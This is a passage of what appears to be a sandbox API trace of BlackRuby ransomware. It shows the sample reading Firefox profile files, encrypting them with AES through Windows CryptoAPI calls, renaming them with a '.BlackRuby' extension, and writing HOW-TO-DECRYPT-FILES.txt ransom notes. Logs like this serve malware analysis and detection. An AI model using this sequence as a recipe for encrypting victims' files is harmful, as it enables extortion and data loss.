lpBuffer=0x1ba875c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1ba875c*, lpNumberOfBytesRead=0x18eb68*=0x9a, lpOverlapped=0x0) returned 1 [0054.904] GetLastError () returned 0x0 [0054.904] CloseHandle (hObject=0x184) returned 1 [0054.904] GetLastError () returned 0x0 [0054.904] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", lpFilePart=0x0) returned 0x60 [0054.904] GetLastError () returned 0x0 [0054.904] SetErrorMode (uMode=0x1) returned 0x0 [0054.904] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8868ee60, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8868ee60, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xb486c00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x9a)) returned 1 [0054.904] GetLastError () returned 0x0 [0054.904] SetErrorMode (uMode=0x0) returned 0x1 [0054.904] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c790) returned 1 [0054.904] GetLastError () returned 0x0 [0054.938] CryptImportKey (in: hProv=0x37c790, pbData=0x1c03c24, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360aa0) returned 1 [0054.938] GetLastError () returned 0x0 [0054.938] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.938] GetLastError () returned 0x0 [0054.943] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.943] GetLastError () returned 0x0 [0054.943] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ae0) returned 1 [0054.943] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.943] GetLastError () returned 0x0 [0054.943] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c30c70*=0x1, dwFlags=0x0) returned 1 [0054.943] GetLastError () returned 0x0 [0054.943] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c30c3c, dwFlags=0x0) returned 1 [0054.943] GetLastError () returned 0x0 [0054.943] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c30cb8*, pdwDataLen=0x18eb58*=0x190, dwBufLen=0x190 | out: pbData=0x1c30cb8*, pdwDataLen=0x18eb58*=0x190) returned 1 [0054.943] GetLastError () returned 0x0 [0054.943] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c31004*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c31004*, pdwDataLen=0x18eb70*=0x10) returned 1 [0054.943] GetLastError () returned 0x0 [0054.943] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c31034*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c31034*, pdwDataLen=0x18eb78*=0x10) returned 1 [0054.943] GetLastError () returned 0x0 [0054.943] CryptDestroyKey (hKey=0x360aa0) returned 1 [0054.943] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0054.943] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0054.943] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", lpFilePart=0x0) returned 0x60 [0054.943] GetLastError () returned 0x0 [0054.943] SetErrorMode (uMode=0x1) returned 0x0 [0054.943] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.944] GetLastError () returned 0xb7 [0054.944] GetFileType (hFile=0x184) returned 0x1 [0054.944] SetErrorMode (uMode=0x0) returned 0x1 [0054.944] GetFileType (hFile=0x184) returned 0x1 [0054.945] CloseHandle (hObject=0x184) returned 1 [0054.945] GetLastError () returned 0xb7 [0054.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", lpFilePart=0x0) returned 0x60 [0054.945] GetLastError () returned 0xb7 [0054.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_QkFq5lyGjdVoyFYKij3gbokNjTY9pdW8ilvX8Qj9.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_QkFq5lyGjdVoyFYKij3gbokNjTY9pdW8ilvX8Qj9.BlackRuby", lpFilePart=0x0) returned 0x87 [0054.945] GetLastError () returned 0xb7 [0054.945] SetErrorMode (uMode=0x1) returned 0x0 [0054.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8868ee60, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8868ee60, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x28f07ac0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1a0)) returned 1 [0054.945] GetLastError () returned 0xb7 [0054.945] SetErrorMode (uMode=0x0) returned 0x1 [0054.945] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_QkFq5lyGjdVoyFYKij3gbokNjTY9pdW8ilvX8Qj9.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_qkfq5lygjdvoyfykij3gboknjty9pdw8ilvx8qj9.blackruby")) returned 1 [0054.945] GetLastError () returned 0xb7 [0054.946] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.946] GetLastError () returned 0xb7 [0054.946] SetErrorMode (uMode=0x1) returned 0x0 [0054.946] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.946] GetLastError () returned 0x5 [0054.947] SetErrorMode (uMode=0x0) returned 0x1 [0054.947] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", lpFilePart=0x0) returned 0x5e [0054.947] GetLastError () returned 0x5 [0054.947] SetErrorMode (uMode=0x1) returned 0x0 [0054.947] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1c4fb78 | out: lpFileInformation=0x1c4fb78*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86e4ee40, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86e4ee40, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd3d7c0b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18000)) returned 1 [0054.947] GetLastError () returned 0x5 [0054.947] SetErrorMode (uMode=0x0) returned 0x1 [0054.947] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", lpFilePart=0x0) returned 0x5e [0054.947] GetLastError () returned 0x5 [0054.947] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", lpFilePart=0x0) returned 0x5e [0054.947] GetLastError () returned 0x5 [0054.947] SetErrorMode (uMode=0x1) returned 0x0 [0054.947] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.948] GetLastError () returned 0x0 [0054.948] GetFileType (hFile=0x184) returned 0x1 [0054.948] SetErrorMode (uMode=0x0) returned 0x1 [0054.948] GetFileType (hFile=0x184) returned 0x1 [0054.948] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x18000 [0054.948] GetLastError () returned 0x0 [0054.948] ReadFile (in: hFile=0x184, lpBuffer=0x2d40d40, nNumberOfBytesToRead=0x18000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x2d40d40*, lpNumberOfBytesRead=0x18eb68*=0x18000, lpOverlapped=0x0) returned 1 [0054.950] GetLastError () returned 0x0 [0054.950] CloseHandle (hObject=0x184) returned 1 [0054.950] GetLastError () returned 0x0 [0054.951] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", lpFilePart=0x0) returned 0x5e [0054.951] GetLastError () returned 0x0 [0054.951] SetErrorMode (uMode=0x1) returned 0x0 [0054.951] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86e4ee40, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86e4ee40, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd3d7c0b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18000)) returned 1 [0054.951] GetLastError () returned 0x0 [0054.951] SetErrorMode (uMode=0x0) returned 0x1 [0054.961] CryptImportKey (in: hProv=0x37c708, pbData=0x1cabe40, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360c20) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.961] GetLastError () returned 0x0 [0054.966] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.966] GetLastError () returned 0x0 [0054.966] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360a20) returned 1 [0054.966] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.966] GetLastError () returned 0x0 [0054.966] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1cd8e8c*=0x1, dwFlags=0x0) returned 1 [0054.966] GetLastError () returned 0x0 [0054.966] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1cd8e58, dwFlags=0x0) returned 1 [0054.966] GetLastError () returned 0x0 [0054.967] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d70e80*, pdwDataLen=0x18eb58*=0x18100, dwBufLen=0x18100 | out: pbData=0x2d70e80*, pdwDataLen=0x18eb58*=0x18100) returned 1 [0054.968] GetLastError () returned 0x0 [0054.969] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd8ee8*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1cd8ee8*, pdwDataLen=0x18eb70*=0x10) returned 1 [0054.969] GetLastError () returned 0x0 [0054.969] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd8f18*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1cd8f18*, pdwDataLen=0x18eb78*=0x10) returned 1 [0054.969] GetLastError () returned 0x0 [0054.971] CryptDestroyKey (hKey=0x360c20) returned 1 [0054.971] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.971] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.971] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", lpFilePart=0x0) returned 0x5e [0054.971] GetLastError () returned 0x0 [0054.971] SetErrorMode (uMode=0x1) returned 0x0 [0054.973] GetFileType (hFile=0x184) returned 0x1 [0054.973] SetErrorMode (uMode=0x0) returned 0x1 [0054.973] GetFileType (hFile=0x184) returned 0x1 [0054.973] WriteFile (in: hFile=0x184, lpBuffer=0x2dd12e0*, nNumberOfBytesToWrite=0x18110, lpNumberOfBytesWritten=0x18eb74, lpOverlapped=0x0 | out: lpBuffer=0x2dd12e0*, lpNumberOfBytesWritten=0x18eb74*=0x18110, lpOverlapped=0x0) returned 1 [0054.975] GetLastError () returned 0xb7 [0054.975] CloseHandle (hObject=0x184) returned 1 [0054.975] GetLastError () returned 0xb7 [0054.975] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite", lpFilePart=0x0) returned 0x5e [0054.975] GetLastError () returned 0xb7 [0054.975] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_c6UqFX5wbJuQEdHO0P4voHPSbmyGlWq4HPctN4wjHK74.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_c6UqFX5wbJuQEdHO0P4voHPSbmyGlWq4HPctN4wjHK74.BlackRuby", lpFilePart=0x0) returned 0x8b [0054.975] GetLastError () returned 0xb7 [0054.975] SetErrorMode (uMode=0x1) returned 0x0 [0054.975] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86e4ee40, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86e4ee40, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x28f53d80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18110)) returned 1 [0054.975] GetLastError () returned 0xb7 [0054.975] SetErrorMode (uMode=0x0) returned 0x1 [0054.975] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_c6UqFX5wbJuQEdHO0P4voHPSbmyGlWq4HPctN4wjHK74.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_c6uqfx5wbjuqedho0p4vohpsbmyglwq4hpctn4wjhk74.blackruby")) returned 1 [0054.975] GetLastError () returned 0xb7 [0054.976] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.976] GetLastError () returned 0xb7 [0054.976] SetErrorMode (uMode=0x1) returned 0x0 [0054.976] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.976] GetLastError () returned 0x5 [0054.978] SetErrorMode (uMode=0x0) returned 0x1 [0054.978] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups", lpFilePart=0x0) returned 0x5a [0054.978] GetLastError () returned 0x5 [0054.978] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.978] GetLastError () returned 0x5 [0054.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0054.978] GetLastError () returned 0x5 [0054.978] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups", lpFilePart=0x0) returned 0x5a [0054.978] GetLastError () returned 0x5 [0054.978] SetErrorMode (uMode=0x1) returned 0x0 [0054.978] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360c20 [0054.986] GetLastError () returned 0x5 [0054.986] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0054.986] GetLastError () returned 0x5 [0054.986] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0054.986] GetLastError () returned 0x5 [0054.987] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0054.987] GetLastError () returned 0x5 [0054.987] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0054.987] GetLastError () returned 0x12 [0054.987] FindClose (in: hFindFile=0x360c20 | out: hFindFile=0x360c20) returned 1 [0054.988] SetErrorMode (uMode=0x0) returned 0x1 [0054.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups", lpFilePart=0x0) returned 0x5a [0054.988] GetLastError () returned 0x12 [0054.988] SetErrorMode (uMode=0x1) returned 0x0 [0054.988] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360c20 [0054.989] GetLastError () returned 0x12 [0054.989] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0054.989] GetLastError () returned 0x12 [0054.989] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0054.989] GetLastError () returned 0x12 [0054.989] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0054.989] GetLastError () returned 0x12 [0054.989] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0054.989] GetLastError () returned 0x12 [0054.989] FindClose (in: hFindFile=0x360c20 | out: hFindFile=0x360c20) returned 1 [0054.990] SetErrorMode (uMode=0x0) returned 0x1 [0054.990] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json", lpFilePart=0x0) returned 0x76 [0054.990] GetLastError () returned 0x12 [0054.990] SetErrorMode (uMode=0x1) returned 0x0 [0054.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), fInfoLevelId=0x0, lpFileInformation=0x1cf828c | out: lpFileInformation=0x1cf828c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2ba9a20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xa2ba9a20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xa2bbab90, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xbdb)) returned 1 [0054.991] GetLastError () returned 0x12 [0054.991] SetErrorMode (uMode=0x0) returned 0x1 [0054.992] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x73 [0054.992] GetLastError () returned 0x12 [0054.992] SetErrorMode (uMode=0x1) returned 0x0 [0054.992] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.993] GetLastError () returned 0x0 [0054.993] GetFileType (hFile=0x184) returned 0x1 [0054.993] SetErrorMode (uMode=0x0) returned 0x1 [0054.993] GetFileType (hFile=0x184) returned 0x1 [0054.993] WriteFile (in: hFile=0x184, 